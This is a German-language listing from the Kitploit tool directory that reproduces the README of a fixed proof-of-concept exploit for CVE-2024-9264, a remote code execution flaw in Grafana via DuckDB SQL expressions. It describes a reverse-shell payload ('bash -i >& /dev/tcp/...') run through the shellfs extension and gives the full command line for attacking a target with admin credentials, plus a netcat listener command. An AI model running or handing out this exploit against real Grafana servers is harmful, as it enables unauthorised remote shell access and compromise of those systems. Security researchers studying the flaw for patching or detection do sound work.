Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9264-Fixed — Korrigierter Proof-of-Concept-Exploit für CVE-2024-9264, eine kritische Grafana RCE über DuckDB SQL-Ausdrücke. Führt eine Reverse-Shell unter Verwendung der korrigierten shellfs-Erweiterung und der writefile()-Funktion aus. | Kitploit
Tools/GitHubGitHub/exerrdev/cve-2024-9264-fixed
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

Korrigierter Proof-of-Concept-Exploit für CVE-2024-9264, eine kritische Grafana RCE über DuckDB SQL-Ausdrücke. Führt eine Reverse-Shell unter Verwendung der korrigierten shellfs-Erweiterung und der writefile()-Funktion aus.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

🛠️ CVE-2024-9264 - Behobener Grafana RCE-Exploit

Dies ist eine korrigierte Version des Proof-of-Concept-Exploits für CVE-2024-9264, eine kritische Remote-Code-Ausführung-Sicherheitslücke in Grafana (über SQL-Ausdrücke und DuckDB).

🔗 Ursprüngliche Meldung: Grafana Security Release
❌ Ursprünglicher PoC: Defekt aufgrund von Syntaxfehlern und fehlerhafter Verwendung von write_file()
✅ Diese Version funktioniert und wurde auf einer anfälligen Grafana 11.0.0-Instanz getestet.


✅ Korrekturen in dieser Version

  • ✅ Verwendet korrekt writefile() anstelle von write_file() (DuckDB-Funktion)
  • ✅ Korrektes Shell-Payload mittels bash -i >& /dev/tcp/...
  • ✅ Reverse Shell wurde erfolgreich über die shellfs-Erweiterung geschrieben und ausgeführt

📦 Voraussetzungen

  • Grafana-Instanz mit:
    • DuckDB-Backend
    • Möglichkeit, install shellfs from community auszuführen
  • Ein Netcat-Listener auf Ihrem Angreifer-Rechner

🚀 Verwendung

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

Dann lauschen Sie mit:

root@kitploit:~
nc -lvnp 4444

⚠️ Rechtlicher Hinweis

Dieses Projekt dient ausschließlich zu Bildungszwecken.
Verwenden Sie es nicht gegen Ziele, für die Sie keine Testberechtigung haben.


✍️ Autor dieser Korrektur

Modifiziert und validiert von Exerr — ursprünglicher PoC von z3k0sec.

Tool herunterladen